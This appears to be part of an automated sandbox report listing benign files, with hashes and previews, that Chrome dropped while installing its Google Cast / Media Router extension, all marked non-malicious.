                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15542
                                                                                                                                                                                Entropy (8bit):5.336342457334077
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:OGNSbprOWklwIc3uk+zwr5a+qF6LtP2nFjYqcV6c8TEKdl:wrfNV9r5avYqcV6uml
                                                                                                                                                                                MD5:B0420F071E7C6C2DE11715A0BF026C63
                                                                                                                                                                                SHA1:F41CC696786B18805DB8DC9E1E476146C0D6BE90
                                                                                                                                                                                SHA-256:309F946F753DF6AF5C255D772EA0D429462152F78ABA4A96A2E369707A2C6B67
                                                                                                                                                                                SHA-512:67B42FC962AB70FFF86777E5057047EF4CFFDA4BED040F9D45BB5DB0275C3B5F21B17924AE5C51C71E8B078AB88AE3001C70CDB4E1994D4C8A20DEFC3A1D34FA
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Donuyor".. },.. "1213957982723875920": {.. "message": "A..n.z. a.a..dakilerden hangisi en iyi .ekilde tan.mlar?".. },.. "128276876460319075": {.. "message": "Cihaz Bulma".. },.. "1428448869078126731": {.. "message": "Videonun D.zg.n Oynat.lmas.".. },.. "1522140683318860351": {.. "message": "Ba.lant. ba.ar.s.z oldu. L.tfen tekrar deneyin.".. },.. "1550904064710828958": {.. "message": "D.zg.n".. },.. "1636686747687494376": {.. "message": "M.kemmel".. },.. "1802762746589457177": {.. "message": "Ses d.zeyi".. },.. "1850397500312020388": {.. "message": "Chromecast'inizi $START_LINK$Google Home uygulamas.nda$END_LINK$ g.rebiliyor musunuz? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):17539
                                                                                                                                                                                Entropy (8bit):5.492873573147444
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vDBprzaoaqEv390hrTr6hlRU62cdV6uml:/BaFNe76GYX6uml
                                                                                                                                                                                MD5:FF06E78C06E8DFF4A422EA24F0AB3760
                                                                                                                                                                                SHA1:A434D1CE22DE0D2FD1842E94F5815F7B1972D1EE
                                                                                                                                                                                SHA-256:E209FDEF12CCEC03B4E0D5B9464F90D527E62C5BC4DD565C680661D7F282AB02
                                                                                                                                                                                SHA-512:8EADCC918F51A946A68AAF4D9DD7F3894BE470FD0A0550E4160D609F30C78BD55508B3DF4D62A28C0813D83C5C10F9A7BFE656A4CF519E4CC814FFB07F1E9F3B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": ".. . ............ ..... ........ ...... .... ......?".. },.. "128276876460319075": {.. "message": "......... ........".. },.. "1428448869078126731": {.. "message": "......... ........... .....".. },.. "1522140683318860351": {.. "message": ".. ....... ............. ......... ........".. },.. "1550904064710828958": {.. "message": "...... ...........".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".. ...... .. .... ........ Chromecast . $START_LINK$....... Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeho
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16001
                                                                                                                                                                                Entropy (8bit):5.46630477806648
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:8xyKyprnBTF0cEW5xk0rdBrQBiaiNiw+3KrV6c8TEKdl:8ULrB5yW5C0rHrOiZ5gKrV6uml
                                                                                                                                                                                MD5:C3A40E8433D96D7E766C011D9EC7502B
                                                                                                                                                                                SHA1:EAB7BFAE48B1D29B95A8AE040DE94D3500824EE3
                                                                                                                                                                                SHA-256:BD3D0F8CF100C96415B224011F550082D4516593CBD3631347748B7D6AD5B85A
                                                                                                                                                                                SHA-512:ADAD26422DCA2728BB77760C508C37888013EA4E3B980D9133FE12737B02589ACD302B4096B2BF1B772A28A2103B2E1F7210F4900468B4590B84C7BBC950F1C1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "D.ng h.nh".. },.. "1213957982723875920": {.. "message": "Tr..ng h.p n.o sau ..y m. t. ..ng nh.t m.ng c.a b.n?".. },.. "128276876460319075": {.. "message": "Kh.m ph. thi.t b.".. },.. "1428448869078126731": {.. "message": ".. m..t c.a video".. },.. "1522140683318860351": {.. "message": "K.t n.i kh.ng th.nh c.ng. Vui l.ng th. l.i.".. },.. "1550904064710828958": {.. "message": "M..t m.".. },.. "1636686747687494376": {.. "message": "Ho.n h.o".. },.. "1802762746589457177": {.. "message": ".m l..ng".. },.. "1850397500312020388": {.. "message": "B.n c. th. nh.n th.y Chromecast c.a m.nh trong $START_LINK$.ng d.ng Google Home$END_LINK$ kh.ng? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "conte
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\zh\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):14773
                                                                                                                                                                                Entropy (8bit):5.670562029027517
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:hppr6VVD8/LkiQKrTV2U00jT25kNV6c8TEKdl:hr88/YOrTjF2GV6uml
                                                                                                                                                                                MD5:D4513639FFC58664556B4607BF8A3F19
                                                                                                                                                                                SHA1:65629BC4CBBACA498F4082DD5884C8D3D7DDDC8A
                                                                                                                                                                                SHA-256:C6D49997A9B4FF7FE701EC3644B1A523679A27778FB4BD39B7DBCA9F1ACCE595
                                                                                                                                                                                SHA-512:16260FAC30D57EBFD577833F45D52FEA446ABE877D0D4015EF47C5C9072B81DDA71ED4E5E7DAFDEBE82B26556A4477EA4BFCDEC227058E381B9812DAB1F4379B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "..".. },.. "1213957982723875920": {.. "message": "..................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": ".........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "... $START_LINK$Google Home ..$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN": {.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):14981
                                                                                                                                                                                Entropy (8bit):5.7019494203747865
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:d2XprmNaHYkOkAFzrlR/jTcGIEaXV6c8TEKdl:WrT4uozrl/sXV6uml
                                                                                                                                                                                MD5:494CE2ACB21A426E051C146E600E7564
                                                                                                                                                                                SHA1:D045ECC2A69C963D5D34A148FE4A7939DE6A1322
                                                                                                                                                                                SHA-256:A1053F9496ED7FA3C625C94347F07A5E760F514FD8EE142EC9EE64E86B9C063D
                                                                                                                                                                                SHA-512:DE2C8498B55749B4D35CF2627E55271F7F09E4560FA16D7094EFB4085CF1E5FAE36F067AAC01AE120548C00DC8AA530EE96079B5CC3E322DF9FF8592799AEB3F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": "................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": "...........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": ".... $START_LINK$Google Home ....$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8873
                                                                                                                                                                                Entropy (8bit):5.791657841286989
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:RbhF22gSNenY4QTm7B9rh/xJvrlib6L5Q6wltsYa:LM9xlv
                                                                                                                                                                                MD5:934A5882214683DEDF130E1C7E513AFD
                                                                                                                                                                                SHA1:4CB84A956148E8F3739681546850996741FDF421
                                                                                                                                                                                SHA-256:D87B0B61750D36CEE2647B59213BAAC8B046C9A929C396CAF36F61AF95939F63
                                                                                                                                                                                SHA-512:C207CED74351BE35DFFD9B1CB991D18B92DEE7093371374FE725C31F541BD680CF04871543D078103D7951E7F3998EBE5F6A91A45A11562055F5E4BD37FC4AF4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZmxYTGNaVTNJSWstTnZiaDlMb0FDQl9lUDc0ODMtUmlkNXliYnQxczBRMCJ9LHsicGF0aCI6Il9sb2NhbGVzL2FyL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ0REo1Y2kwbU53eG5CNmRjQ3Z6cDZRbjZqaGU0cjk5VTRfMmJYVTZsbXZBIn0seyJwYXRoIjoiX2xvY2FsZXMvYmcvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik5FVEw0bjRHWTdGTUVyQnNWVFVpTDFoTERfdGVBRVJOSkVhZk5HT1FUZ0EifSx7InBhdGgiOiJfbG9jYWxlcy9ibi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWWtEUkRMZktna3h5QXFpNS1YNjN3VWlDYU9DaTJ3ZDg5cHp4dnBmMlR5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiI0OVozYVVUekJxejA3RFFtV2NDMUdGZy1YdW43OXJZOGNJMXRVU1VoNVRNIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6InhaWk1DMlNaT2ZiUl91bHRRWXNtWEdWUGZBaEJfVjNIdHVSeGlQMlhwR0kifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWlBQdnFIMVBHaFIxZkh6Qzd
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\angular.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):607402
                                                                                                                                                                                Entropy (8bit):5.38463772575273
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:pA7XbYzz3zA/hJNpwsswmlJp49tkhSZWZhPsFv:q7XbYzD8/hJNhshlJp49tkhSZWZhP6
                                                                                                                                                                                MD5:FCE26058E60BD1CF870623C640481A4F
                                                                                                                                                                                SHA1:F95B53ABA83D9F2B1206D79020887D8EF019B737
                                                                                                                                                                                SHA-256:A9B552276ED7342DC92C240F98C68433E7C711436E285A88E0DE9520F3640925
                                                                                                                                                                                SHA-512:51BD481CA8D3A5E21C70A26B69805C62780AFD10476C53FF013D811A6EBA618217D164A03B2C1E5CAC8EFA7E88899C8E14BD53FE452932A13FE8C6E010B9A186
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: //third_party/javascript/angular/v1_6/angular.min.js./*. AngularJS v1.6.4-local+sha.617b36117. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.'use strict';(function(D){'use strict';function te(a){if(G(a))v(a.objectMaxDepth)&&(Uc.objectMaxDepth=ac(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return Uc}function ac(a){return ca(a)&&0<a}function K(a){return function(){var b=arguments[0];var d="["+(a?a+":":"")+b+"] http://errors.angularjs.org/1.6.4-local+sha.617b36117/"+(a?a+"/":"")+b;for(b=1;b<arguments.length;b++){d=d+(1==b?"?":"&")+"p"+(b-1)+"=";var c=encodeURIComponent;var e=arguments[b];e="function"==typeof e?e.toString().replace(/ \{[\s\S]*$/,""):."undefined"==typeof e?"undefined":"string"!=typeof e?JSON.stringify(e):e;d+=c(e)}return Error(d)}}function pa(a){if(null==a||cb(a))return!1;if(J(a)||I(a)||x&&a instanceof x)return!0;var b="length"in Object(a)&&a.length;return ca(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function p(a,b,d){var c;i
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\background_script.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2088
                                                                                                                                                                                Entropy (8bit):5.176623390098955
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:g8MBPC3U7en+enInMtQgQ+AlRRZGz+GhI9OuYMZ8vNI:g84Cme+eokD9G+GOkiO
                                                                                                                                                                                MD5:47D5838CF5DB13E4E7EF71EC5FC940A1
                                                                                                                                                                                SHA1:6AAE6A72DADCD30F0C8D3095E90468996B59ABB7
                                                                                                                                                                                SHA-256:E0F0E47CDFE7C7D6E6BB63A789D7C20B05AB8B3F6ADFDF07D08793437F2CCD42
                                                                                                                                                                                SHA-512:82515B9B3F154C3B3EA18C62137F07DF8933421C096989ABD0CC4F5A4B3AA06411EE097FAC38475ECB386A6094F99EA9D08CE31D409A41E2757733C4FC86B407
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 'use strict';$a("mr.TestProvider");var ay,wx,by=$a("mr.Init"),cy=function(a){void 0!==a.use_views_dialog&&by.info("Using the "+(a.use_views_dialog?"Views (Harmony)":"WebUI")+" dialog.");void 0!==a.enable_cast_sink_query&&by.info("Native Cast MRP is "+(a.enable_cast_sink_query?"disabled":"enabled")+".");void 0!==a.use_mirroring_service&&by.info("Native Mirroring Service is "+(a.use_mirroring_service?"enabled":"disabled")+".")};Dr().init();ay=new ob("MediaRouter.Provider.WakeDuration");wx=new Mx;.var dy=(new Promise(function(a,b){switch(window.location.host){case "enhhojjnijigcajfphajepfemndkmdlo":a();break;case "pkedcjkdefgpdelpbcmbmeomcjbeemfm":chrome.management.get("enhhojjnijigcajfphajepfemndkmdlo",function(c){chrome.runtime.lastError||!c.enabled?a():b(Error("Dev extension is enabled"))});break;default:b(Error("Unknown extension id"))}})).then(function(){return chrome.mojoPrivate&&chrome.mojoPrivate.requireAsync?new Promise(function(a){chrome.mojoPrivate.requireAsync("media_router_bi
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\cast_sender.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):50197
                                                                                                                                                                                Entropy (8bit):5.271512845100311
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:SYrnK3OaLzBjUl3YUDNEHruOQVjUR7BELYHppUTnFUbQwTv+4A/SwLGR7gPBJsmL:SYrnKeEzBjUl3YUDNEHruOQVjUR7BELr
                                                                                                                                                                                MD5:BBEA05A7844E45C1CF7B7479506DBB0F
                                                                                                                                                                                SHA1:4E421EE2CE22E9E10D7CD9BBC0F9FD38C71716FA
                                                                                                                                                                                SHA-256:BB77A95786B01BD9D9A0F96B6AEA759E4B4C7CF9275E6B11C819D3BEA867CD8B
                                                                                                                                                                                SHA-512:B5F5AF810545F7EB790A1F63B09C093752585401D60DAAF6545BADD444968D47F46263BA6639531C13B1D6182D4CA0CD0718DC3E399DA620C4FE78262A5135F7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}},ca="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},k;.if("function"==typeof Object.setPrototypeOf)k=Object.setPrototypeOf;else{var m;a:{var da={Ub:!0},ea={};try{ea.__proto__=da;m=ea.Ub;break a}catch(a){}m=!1}k=m?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var fa=k,n=function(a,b){a.prototype=ca(b.prototype);a.prototype.constructor=a;if(fa)fa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c]},p=this||self,ha=function(){},q=function(a){var
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\common.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):38099
                                                                                                                                                                                Entropy (8bit):5.424217989145786
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:xhQXYr24Z15Ey17Pbgw2N8AsdVyjj4DS/U9DSbjvN:xhQXYrzX17PbD2MdV9DLM5
                                                                                                                                                                                MD5:B6B210313827B63A322E102627320835
                                                                                                                                                                                SHA1:03D4A5DDF7E68F51B73E5C5C1D852D5F50611B8D
                                                                                                                                                                                SHA-256:35AD6DB342342660ECE38A8967145228E1458ADDDE750ED4F1DDE6A17F351A15
                                                                                                                                                                                SHA-512:5C8C3B5895B541DE6484CC8BFB20E55C2548DBB222B5294C849F3165D139F9F958825384C18C7A8C1836E413CCA1D0C6E9B843254DC1FAA78CBAB50E0BCA712F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),ea=function(a,b){if(b){var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];e in c||(c[e]={});c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ea("Symbol",function(a){if(a)return a;var b=function(e,f){this.g=e;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\feedback.css
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3116
                                                                                                                                                                                Entropy (8bit):5.0201551881561635
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:31YB10fXdq14jTAu0mgs0gwa8J8LZmY1181Y5OGib210bGjKL1rT1hJ14DKtKUHo:nfX8udgaw7mL55cSuoKtHHxOA/x0n
                                                                                                                                                                                MD5:D8EE20737329319BFA1ACBB0E6C219A6
                                                                                                                                                                                SHA1:D24118D81990E1316CA809669ECB603724C6E7E2
                                                                                                                                                                                SHA-256:A582FC20DBCAD1918000B690EB8F237EC14E5B836FD7F799C35702D88DBE6862
                                                                                                                                                                                SHA-512:7633682BF161EB1EDE7D62AA9C5E65A727C030DBAA483FEC4F5948C5A5849EFA342A52260097358BF4EF02F07D0464C3356152ABBE4A5C534580960D80594AC9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: :root {. --paper-blue-500: rgb(33, 150, 243);. --paper-blue-500-dark: rgba(33, 150, 243, 0.87);. --paper-blue-500-light: rgba(33, 150, 243, 0.26);.};..body {. font-size: 12px;. height: inherit;.}..#description,.#required-legend {. margin-top: 22px;.}..#description,.#form-buttons,.#required-legend,.#title {. padding: 0 17px;.}...informative {. font-size: 13px;. line-height: 13px;.}..#feedback-confirmation {. width: initial;.}..#feedback-fine-log-warning {. color: rgb(219, 68, 55);. margin: 10px 0;.}..#feedback-type-toggle,..question {. padding: 16px 17px;.}..#form {. -webkit-padding-end: 24px;. -webkit-padding-start: 24px;. background-color: white;. color: rgba(0, 0, 0, 0.87);. box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);. margin: -100px auto 48px auto;. padding: 34px 17px;. width: 720px;. z-index: 1;.}..#form-buttons {. flex-direction: row;. display: flex;. justify-content: flex-end;. margin-top: 34px;.}..#header {. margin-bottom: 22px;.}..#header-banner {.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\feedback.html
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15606
                                                                                                                                                                                Entropy (8bit):4.340710080778977
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:WGEiiDKFK5N+bVfifi5sdUemfOHT5MGTGhCBo5NmsAOZ0RsAOZYu24kJkcdFXOrO:WGESFKrsitdfGO6nrom6mcCswz4TLn
                                                                                                                                                                                MD5:0EFADA4B2A95CC2D4AE00F794759D763
                                                                                                                                                                                SHA1:FEC3BB7837BE805955601F8C211DC5BE1F16535D
                                                                                                                                                                                SHA-256:8CB99506A2ED9BCC6E1A66E0F218524C91304B3EBFCA113D0FECBB3D80078D0D
                                                                                                                                                                                SHA-512:7ADF9EA446F06C5BFB203CAE8E0CB97E230E7230D9EC7BEAB8B7F76AC8E9B9CF0FC7395C87D90836D7FDCA57E8F80FD9E0091807B3F902A37F67C69144E49616
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: <!DOCTYPE html>.<html ng-app="feedbackApp" ng-controller="FeedbackCtrl". ng-csp xmlns="http://www.w3.org/1999/xhtml" lang="top.language">.<head>. <title>. Chrome Media Router feedback. </title>. <link rel="stylesheet" type="text/css" href="feedback.css">. <link rel="stylesheet" type="text/css" href="material_css_min.css">. <script src="angular.js"></script>. <script type="text/javascript" src="common.js"></script>. <script type="text/javascript" src="feedback_script.js"></script>.</head>.<body>. <div id="header-banner"></div>. <div>. <div id="form">. <div id="header">. <div id="title">. <angular-message key="MEDIA_ROUTER_FEEDBACK_HEADER". desc="Header of the Media Router feedback page.">. Tell us what's happening with Google Cast.. </angular-message>. </div>. <div id="description" class="informative">. <angular-message key="MEDIA_ROUTER_FEEDBACK_FORM_DESCRIPTION". desc="Text to d
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\feedback_script.js
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):24452
                                                                                                                                                                                Entropy (8bit):5.747175355035489
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:sJN1cE3zd5m39N/MlzxZibygiLKM9ojX/ySoO4AM5AnshEwR0ChiR5xCzYlBbfTj:sJN1cE3zd5m39N/MlzxZibygiLKM9oj1
                                                                                                                                                                                MD5:26F3B1FE17AD7EA58FEB76414A2A9F61
                                                                                                                                                                                SHA1:00460DF77358708E951BCD745B388B49D81B7D30
                                                                                                                                                                                SHA-256:56686B8D4F0A467D52EA03F503B6F8387742E9F8F3A90AD75C11BC9E3FF243D7
                                                                                                                                                                                SHA-512:ED0A78A934AE02B4606919F04B31F7D78E44E4F654DC20107BD214C2B8614A91E47E6ACFCD504EAC95AE3A06238BB04C2417B71075A9D5192E1CF96E3FC6EB5C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: 'use strict';/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var sg=function(a,b,c){a.timeOfStartCall=(new Date).getTime();var d=c||w,e=d.document,f=a.nonce||Fa(d);f&&!a.nonce&&(a.nonce=f);if("help"==a.flow){var g=Ha("document.location.href",d);!a.helpCenterContext&&g&&(a.helpCenterContext=g.substring(0,1200));g=!0;if(b&&JSON&&JSON.stringify){var h=JSON.stringify(b);(g=1200>=h.length)&&(a.psdJson=h)}g||(b={invalidPsd:!0})}b=[a,b,c];d.GOOGLE_FEEDBACK_START_ARGUMENTS=b;c=a.serverUri||"//www.google.com/tools/feedback";if(g=d.GOOGLE_FEEDBACK_START)g.apply(d,b);.else{d=c+"/load.js?";for(var m in a)b=a[m],null==b||Na(b)||(d+=encodeURIComponent(m)+"="+encodeURIComponent(b)+"&");a=qg(fg(e),"SCRIPT");f&&a.setAttribute("nonce",f);f=hd(d);te(a,f);e.body.appendChild(a)}};y("userfeedback.api.startFeedback",sg);var tg=function(){this.j=this.h=this.u=this.modelName=this.l=this.g=this.Ac="";this.o=this.m=this.C=!1};var ug=chrome.i18n.getMessage("4163185390680253103"
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\manifest.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2284
                                                                                                                                                                                Entropy (8bit):5.29272048694412
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:QWaLGou01ghZ7CsbCypwQdmv7pee3hZq/1C/ao1XJN8U3:DaLrgCWrdmTplZNx
                                                                                                                                                                                MD5:F76238944C3D189174DD74989CF1C0C6
                                                                                                                                                                                SHA1:85CE141EC8867B699668A5F5A48F404C84FCEB04
                                                                                                                                                                                SHA-256:2EF48A1CF322DE356E8844DD2FD3431E8E7ACD04770649B6507EACA5ABDB53A7
                                                                                                                                                                                SHA-512:330EC2ADC42A8AE653051694954795664EEECDB1A0E0F7A6BC03349C4FD1568BCC81FF2C4A6D826B07BEA7BED26CC27157A1BFAE4B6FC34B3E121DCE0A5CB26D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
